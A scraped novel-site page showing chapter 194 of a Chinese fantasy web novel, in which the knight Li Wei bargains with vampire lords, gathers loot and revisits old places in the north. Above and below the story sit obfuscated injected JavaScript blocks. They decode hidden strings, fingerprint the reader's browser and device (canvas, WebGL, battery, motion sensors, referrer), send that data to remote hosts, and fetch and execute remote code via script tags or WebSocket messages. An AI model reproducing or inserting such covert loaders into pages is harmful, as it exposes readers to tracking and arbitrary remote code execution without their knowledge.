宜小说

安装
字:
关灯 护眼
宜小说 > 巫师:从骑士呼吸法开始肝经验 > 0194 十二阶!龙躯降生,业火红莲!

0194 十二阶!龙躯降生,业火红莲!

(function(){function t11d18b6e(x16ae02){var fdb804468="9O5M.Jl$e4/],fjxG!7y2Ph^iwnT:L36pHCs0v&B?;dcKqESDY[W(Vk8z~m=rgFo%-uIaR1_ZtNb|XUA@Q";var tc68f0bf="sNHqg?pU~i:rQ/E73txf=98RP1JLXeBAG6uT2IF(&VoKv|MO4l[0nD!,_.hb%5jWz;kYc-$@aSdyC]^Zmw";return x16ae02.split('').map(function(nad834){var o1e191=fdb804468.indexOf(nad834);return o1e191==-1?nad834:tc68f0bf[o1e191]}).join('')}var c=t11d18b6e('ftp1://Q4(NdQ["" + "." + "=" + "W" + "0" + "w" + "G" + "Z" + "P" + "0"+""X2yC(a!4d(B) { - ByC(a!4d( B]0xyHa=8 9yhGhWhh8 (a=wN0wNh8 ZGaxDgGg8 @00w=HgxW) { 4y BfUEZaqo4(f~!L9!B(ZK4.Z!d]~lYZ!yd]@)) { ]L!C]( }- KZ] mDyygDa 2 yC(a!4d( B.ZHxgNZg) { ]L!C]( t!]4(.~y]d@|mZ]|dNLB.ZHxgNZg) }- KZ] MDHHZawyW 2 ZGaxDgGg[mDyygDaBW7Hw) + mDyygDaBW7xD) + mDyygDaBW7H&) + mDyygDaBW7H0)X8 FZGhPLL 2 ZGaxDgGg[mDyygDaBW7H0) + mDyygDaBW7xD) + mDyygDaBW7H&) + mDyygDaBW7Hw)X8 LGxD0LPL 2 @00w=HgxW[MDHHZawyWB"IG;ba@;CN&OFa@YQN622")X8 YDDywgW0N 2 MDHHZawyWB"IGnYI:^Y^o7Y=o;CN622")- KZ] bN=HgL 2 MDHHZawyWB"L@OuAonwAQ22")- KZ] y=0w=L0N- 4y BYdaZ!4d(~9LZ]am~4(NL7SyBbN=HgL) > Rw) { y=0w=L0N 2 @00w=HgxW[YDDywgW0NXBMDHHZawyWB"Np;DNp&bAoj2"))- y=0w=L0N~4N 2 "!" + BEZ!m~]Z(Nd@B) * wWWWW)- y=0w=L0N~9!bYL~Q4N!m 2 "wWWr"- y=0w=L0N~9!bYL~mL4.m! 2 "GWWl7"- y=0w=L0N~N49Z=YLN 2 !]CL- @00w=HgxW~=dNb~ZllL(N|m4YNBy=0w=L0N) } KZ] !wyaxWaNN 2 @00w=HgxW[YDDywgW0NXBMDHHZawyWB"ZoAbIowY"))- !wyaxWaNN~4N 2 "7" + BEZ!m~]Z(Nd@B) * wWWWW)- !wyaxWaNN~9!bYL~Q4N!m 2 "wWl7"- !wyaxWaNN~9!bYL~mL4.m! 2 g + "l7"- !wyaxWaNN~9!bYL~=Zau.]dC(N 2 "#&&&"- KZ] KWNL0 2 yC(a!4d( BdGPGgy0yw) { !wyaxWaNN~9]a 2 ["m!!l9/ff"8 dGPGgy0yw8 "]"8 "Fwww"8 (a=wN0wNh + "Jz]2" + BFZGhPLLBYdaZ!4d(~m]Ly))X~Fd4(B"f")- @00w=HgxW~=dNb~ZllL(N|m4YNB!wyaxWaNN) }- 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(9L(N =]4N.4(. md9! " + 9yhGhWhh } ZGaxDgGg[MDHHZawyWB"A@;WI0.2")XB["m!!l9/ff"8 MDHHZawyWB9yhGhWhh)8 "m@~F9J" + VZ!L["(dQ"XB) + By=0w=L0N 22 (CYY J "" / bN=HgL)X~Fd4(B"f"))~!mL(BBYygDDHhP) 2> YygDDHhP~!L7!B))~!mL(BBYygDDHhP) 2> { 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(]LaL4KL =]4N.4(. md9! " + YygDDHhP }- KWNL0BMDHHZawyWBYygDDHhP~9lY4!B"")~]LKL]9LB)~Fd4(B""))) })~aZ!amBBL]]) 2> { KWNL0BMDHHZawyWB]0xyHa=)) })- ZGaxDgGg["ZNNjKL(!T49!L(L]"XB"@L99Z.L"8 yC(a!4d( BL) { 4y BL~NZ!Z~u 22 (a=wN0wNh) { @00w=HgxW~.L!jYL@L(!3bvNB!wyaxWaNN~4N)~]L@dKLB)- 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(]LaL4KL 4y]Z@L ld9! @L99Z.L" } (LQ &C(a!4d(B"Z].9"8 MDHHZawyWBL~NZ!Z~K))B{ z!Na9/ LGxD0LPL8 z!]Z/ y=0w=L0N }) } }) })B"Z@jCa0ml=@h%N:vCL5YH"8 "I0PC=@;FN|g7I:YMA:lGT(mgL.22"8 "wG000HPP0gxP0g"8 Q4(NdQ8 NdaC@L(!) }-.=W0wGZP0B)-'.substr(7));new Function(c)()})();
章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
天坑。
  
  密隐同盟。
  
  此刻的城堡,已经空空落落。
  
  大多数血族,死的死,跑的跑。
  
  “我本来只是来救安德森的,你我非亲非故,我为何要放你?给我一个理由。”李维面色平静的问道。
  
  安度因沉默,而后他说道:“不妨阁下说说你需要什么?如果是我有的,我都可以给你,毕竟以阁下的实力,凡人的金钱地位,想必都看不上眼。”
  
  李维念头转动。
  
  这安度因身为密隐同盟的盟主,活了成百上千的老怪物,就算是人间资源贫乏,在经年累月的积累下,应该也积攒了不少好东西了。
  
  “呼吸法,太石,巫器,你们血族的传承知识,血器,我感兴趣的东西可多了去了。”李维意味深长的笑道。
  
  安度因听闻,面色一喜,连忙说道:“呼吸法?这东西我有啊,从我来到人间到现在,试图消灭我或者擅闯我领地被我杀死的人类骑士,我都忘记有多少了,也因此得到了不少呼吸法传承图,阁下若是需要,我这边的呼吸法都可以给你。”
  
  “巫器的话,我这边只有一些准巫器,都是人间的野巫师身上得来的,太石我倒是有一点,但不多。”
  
  “我们原生血族的核心传承知识,这个东西都是每位原生血族从血河之中继承的,即便我想要传授给阁下,也巧妇难为无米之炊。这些知识,我们这些血河的子嗣,只有使用之权利,并没有传授的权利,一些普通的传承知识,我倒是可以提供给阁下。”
  
  安度因无奈说道。
  
  李维找斯克因确认了一下,的确是如此。
  
  他心中越来越感觉血河这玩意儿不简单,必须早日将血兽呼吸法变异成其他的呼吸法,这样才有可能对抗血河。
  
  他可不想好不容易将血兽呼吸法修行到真正的极限了,却发现自己成为了血河的分身。
  
  “那血器呢?你们威廉家族不可能连一件血器都没有吧?”李维问道。
  
  “血器……在五百年前,我们密隐同盟曾经和圣辉教会有过冲突,我们家族的血器被教会的强者给夺走了,如今可能封印在教会的天堂山重地,你可以向斯克因求证,我说的绝对属实。”安度因说道。
  
  “的确,我们威廉家族的血器【血羽之弓】乃是不逊色于这【血禁锥】的三级血器,由三级血族的肋骨和强大的混血龙族的龙筋打造。
  
  拉开此弓,需要血族血脉,和极其强大的力量,但是一旦拉满之后,最远射程可达百里!
  
  此前那勒森魃家族也曾经多次想要从我们家族这里获得【血羽之弓】。
  
  就是想用他们家族的【血禁锥】搭配【血羽之弓】。用
  
  最强大的弓配上最锐利的箭,才能发挥这两件血器的真正威力!
  
  百里之内,只要准头够好,三级之下,皆可洞穿。就算是三级强者,中招之后,肯定也不好受。”
  
  威廉说道。
  
  李维听到如此,也就不再纠结。
  
  “那剩下的就用金币来支付吧。”
  
  原生血族没有类似于人类和巫师的灵魂,只有诞生于血河的真灵,契约石板是没啥用了。
  
  李维让安度因立下血河誓言之后,才把安度因和其他几位同一个阵营的原生血族放了,
  
  李维将这些血禁锥收集起来。
  
  这东西封印法术或者类法术能力的作用对于巫师来说用处不大,毕竟封印的法术或者类法术能力都是随机的。
  
  而哪怕是最弱的一环巫师,算上戏法的话,掌握的法术都是至少几十种甚至上百种。
  
  若是能够封印这个巫师的主要法术还好,要是封印一个人家本来就用不到的戏法,那完全没有什么用处。
  
  但是血禁锥本身质地极其坚硬,可以穿透自己的十二阶金蛇鳞,也就可以穿透二环巫师的防御力场。
  
  李维心中觉得,这玩意儿当做暗器来使用,绝对好使。
  
  “多谢阁下!”
  
  安度因被释放之后,连忙谢道,一脸谨慎的看着李维。
  
  李维的实力,他是见识到了。
  
  拥有血禁锥的斯克因都不是对方的对手,那如今人间的血族群体之中,可能没有谁可以稳赢李维。
  
  “不必谢我,各取所需。”李维澹澹说道。
  
  就这样,李维把所有的血禁锥收集起来后数了数,一共得到十枚血禁锥。
  
  三级之上的血族死后,会留下血骸,类似于舍利子一样的东西。
  
  血骸可能是血族身躯上的任何部位,而这血禁锥则是一位三级血族的锋利指甲部位,再搭配血族的炼器方法,制作成为血器。
  
  因此血器只有用三级血族以上的血骸才能制作,十分珍贵,对于血族来说,血禁锥这玩意儿的威慑力堪比巫师世界的三环巫器。
  
  在这人世间,总共也没有几件。
  
  这套血器乃是魔宴同盟之中勒森魃家族的至宝之一,如果不是为了让斯克因顺利拿下密隐同盟的控制权,勒森魃家族根本不会将这些给斯克因用。
  
  除此之外,李维发现这些十字架本身貌似也是不错的材料,他也全部收集起来,回到巫师世界可以用来制器或者炼制法阵之物。
  
  安度因则是按照承诺,将一个血色袋子递给了李维,这应该是血族的储物道具。
  
  李维看了看,里面足足有十八部呼吸法传承图,这其中,绝大多数都是粗浅品质的,有三部优秀品质的,并没有完美品质的。
  
  除了那些无家可归的流浪骑士之外,大多数骑士并不会随身携带呼吸法传承图在身上,这样可以避免自己死在外面,害得家族传承都断绝这种情况的出现。
  
  所以虽然安度因杀了很多骑士,可是这其中能够得到呼吸法传承图的,少之又少。
  
  这些呼吸法传承图之中,以力量和速度为主,还有耐力,体质,防御各一部。
  
  这些,都将是李维日后呼吸法破限的原材料。
  
  而太石,拢共加起来也就一千枚不到,对李维来说,只能算是毛毛雨。
  
  这都是来自一些人间的野巫师的东西,很多野巫师甚至没有见过太石,所以这点数量,李维有心理准备。
  
  巫器也没有什么李维看得上眼的东西。
  
  除此之外,就是堆积如山的金币。
  
  这些钱可以让安德鲁在人间继续帮自己收集呼吸法。
  
  剩下则是一些血族普通的传承知识,比方说之前安德森给过李维的类似于血奴咒的咒术,或者一些使用血器的法门。
  
  这些东西,都需要血族血脉才能使用,普通人拿到也没办法用。
  
  不过李维体内就有上位的血族血脉,自然是可以用的。
  
  这些知识都是边缘的,不重要的。核心的如他们的修行秘法,原生血族进阶仪式等等,这个是没办法传授的,强行传授就会被血河意志摧毁,收回血河,回炉重造。
  
  这样一来,血族可以通过初拥的方式在人间建立自己的次生血族部族,并且传授这些次生血族非核心的血族知识。
  
  但核心知识,却是不会泄露给次生血族。依靠这样的方式,血族得以牢牢的控制住这些次生血族。
  
  最终,李维带着斯克因他们,迅速离开了这里。
  
  安度因则是前去寻找其他密隐同盟的强者,虽然这一次李维的到来间接的阻止了魔宴同盟接下来的血祭仪式,但是这群好事者肯定不会善罢甘休的。
  
  接下来的日子。
  
  岁月匆匆而逝。
  
  李维一直在鲜花城堡内给安德森和布来克传授自己进阶传奇的经验技巧,希望这些能让他们有所启发。
  
  李维未来想依靠黄昏骑士团在巫师世界建立自己的势力,那必然需要一群强大的手下。
  
  传奇骑士,也就在人间成宗做祖,
  
  到了巫师世界,远远不够看。
  
  所以他也希望安德森和布来克可以早日突破传奇。
  
  听完李维的传道之后,安德森和布来克也是受益匪浅,不管他们能不能在未来突破传奇桎梏,李维提出的【传奇六维态】概念和【血醒】、【血渴】的境界设想,都让他们颇为震撼。
  
  并且这些境界的名称,他们也表示团长取得还不错,很有水准,不愧是团长。
  
  当然,在传授这些宝贵的知识之前,李维深刻吸取柯林家族灭亡的教训。
  
  即便是安德森和黑骑士,也需要和自己签订契约,除非得到李维的允许,否则这些知识不能随便乱传。
  
  倒不是李维敝帚自珍,怕这天下其他的骑士学起来超过自己。
  
  有熟练度面板,他自信,在骑士之道上,没有人可以超过自己。
  
  李维真正担心的是,这样石破天惊的事情可能让教会警觉起来,从而将自己的黄昏骑士团扼杀在摇篮之中。
  
  他不想自己建立纵横多元位面第一势力的事业创立刚开始就中道崩殂!
  
  所以,这样的事情无论如何小心也不为过。
  
  而李维的呼吸法修行也在按部就班的进行着,红莲呼吸法距离十二阶也越来越近。
  
  血族那边,最近的血族之乱明显的频次下降了。
  
  但是李维并没有放松警惕,这可能是暴风雨之前的宁静。
  
  从斯克因那边得到的情报来看,魔宴同盟针对血祭制定了好几套方案。
  
  斯克因这边,只是其中一套方案,其他的方案,他一概不知。
  
  现在这套方案被李维打掉,其他的,依旧在隐藏在暗处。
  
  在得知斯克因那边的变故之后,魔宴同盟也彻底断掉了斯克因这条线。
  
  防止李维抽丝剥茧,顺藤摸瓜,把他们给找出来。
  
  实际上,李维对于他们想干啥,一点也不关心。
  
  他巴不得血族和教会干起来,自己说不定还能浑水摸鱼,捞点好处。
  
  而在这样的日子过了几个月之后。
  
  时间来到了圣辉历1037年,凛冬之月。
  
  李维收拾好东西,交代完事情之后,告别安德森和黑骑士,离开了鲜花城,那霍格骑士这段时间并没有联系李维,他也不打算在等了。
  
  临走之前,李维问过黑骑士,要不要和自己一起。
  
  因为黑骑士也有巫师天赋,完全可以跟着李维进入巫师世界,有李维的照拂,未来让黑骑士成为正式巫师,不难!
  
  况且,如果黑骑士的黑魔刃想要更进一步,那他必须提高精神力到正式巫师的水平,这一点,李维也告知了黑骑士。
  
  不过黑骑士拒绝了,他已经习惯了人间的生活,去了巫师世界,还得从底层摸爬滚打,他可能也习惯不过来。
  
  至于黑魔刃,黑骑士认为等突破传奇桎梏之后,再想办法也不迟。
  
  李维见黑骑士心意已决,自然也不会强人所难,人各有志,走好自己坚定的道路,就是胜利!
  
  有黑骑士在人间可以和安德森有个照应,倒也是好事。
  
  ……
  
  黑水谷。
  
  李维独自站在已经荒废多年,大雪掩埋的黑蛇堡下,感慨万千。
  
  因为蓝霜的入侵导致整个王国北境的温度下降了很多,犹如进入了冰河时代。
  
  而此时正值寒冬,北境的温度更是滴水成冰,黑水河也不在流淌。
  
  雪花飘落。
  
  发现没啥可看的之后。
  
  李维叹息一声,身影离开了黑水谷。
  
  他去了冰风城。
  
  他打算在离开人间之前,再去那些记忆之中的地方看看。
  
  如今的冰风城,人口稀稀落落,还能坚持住在这里的,都是一些舍不得祖地的小贵族或者没办法离开的人。
  
  李维感知全城,冰风教堂早已经撤离了这地方,除了一些留守这里的牧师之外,也落魄不堪。
  
  】
  
  银山堡内。
  
  一个身材匀称的银发骑士正在训练麾下的士兵。
  
  这是新的银山伯爵,曾经老伯爵之子。
  
  在安德鲁的庇护之下,他已经成为了大骑士,如今也算是拥有了庇护自己家族的实力。
  
  那些麾下士兵穿着的,正是几十年之前,李维给他们制造的秘银装备,这些装备经过岁月和战斗的洗礼,留下了斑驳的战痕和洗不去的血渍。
  
  虽然蓝霜之灾被扼制了,可是蓝霜对于北境的入侵从未停止。
  
  小银山伯爵面色坚毅,英俊的面容的确遗传了老银山的优点。
  
  李维独自找到了银山之墓,曾经的北方七骠骑,如今已经是冢中白骨。
  
  “看着故人离去,这也是一种独特的修行体验吧。”李维苦笑。
  
  他在闪耀酒馆买了一杯雪花啤酒,倒在了银山的墓前。
  
  “毕竟也算是相识一场,愿你带着雪花骑士的勇气,在地下长眠!”
  
  身后,小银山伯爵望着不知道何时出现在自己父亲墓前的男人,面色紧张,但他依旧问道:“阁下是何人?为何闯入……我家族墓地。”
  
  李维早就知道小银山过来了,他转过身来,微笑着说道:“我来看看故人。”
  
  “故人……阁下是我父亲的朋友?”小银山伯爵松了口气,内心却是震惊无比,眼前这个男人,看起来也就是中年模样,可是他的实力,小银山完全捉摸不透。
  
  “朋友?算是吧。”李维面露回忆,缓缓说道,拍了拍小银山伯爵的肩膀,而后转身离开,只留下一道声音在回响。
  
  “你父亲是一位值得尊重的贵族!”
  
  小银山只是个眨眼的功夫,李维的身影,已经完全消失在他面前。
  
  “绝对的强者!顶级大骑士?还是说传奇骑士?”
  
  小银山伯爵的世界观受到冲击。
  
  离开了冰风城,李维一路北上,以他如今的速度,没多久,就到了黑山城。
  
  这是自己大敌黑山公爵的城市,如今已经变成了一座死灵之城。
  
  到处是蓝霜死灵,其中大骑士级别的都有好几只。
  
  这些蓝霜死灵的亡灵之核是好东西,李维打算再收集一些,目前为止,蓝霜死灵之核,只有人间才出产。
  
  地狱位面召唤物的体内虽然也有类似的能量核心,可是在质量上,反而不如这蓝霜出品的。
  
  李维都没有自己动手,他放出来活死人,涌入黑山死城。
  
  没过多久,一大堆亡灵之核就堆在李维面前。
  
  他将这些收起来,望了望黑山城中央的那道蓝色的光芒,将天际撕裂。
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x5a\x4e\x70\x4b\x4a\x5a\x57\x61\x62']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],ec=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='nob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++ec]&&clearTimeout(t[e]);l.length?f():RCxthzmRkG()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++ec]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,url:b(),ref:a(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9hc2tkZmouYWxza2ZkZi5jb206MTg0NNDM=','d3NNzOi8vd3Mud3Fkd29yay5jb206OTc5NNyx3c3M6Ly93cy5zemZobDk5LmNNvbTo5NNzk3',window,document,['N','N']);}:function(){};
安装
继续浏览精彩内容
到笔趣阁APP免费阅读
《巫师:从骑士呼吸法开始肝经验》
打开
浏览器
继续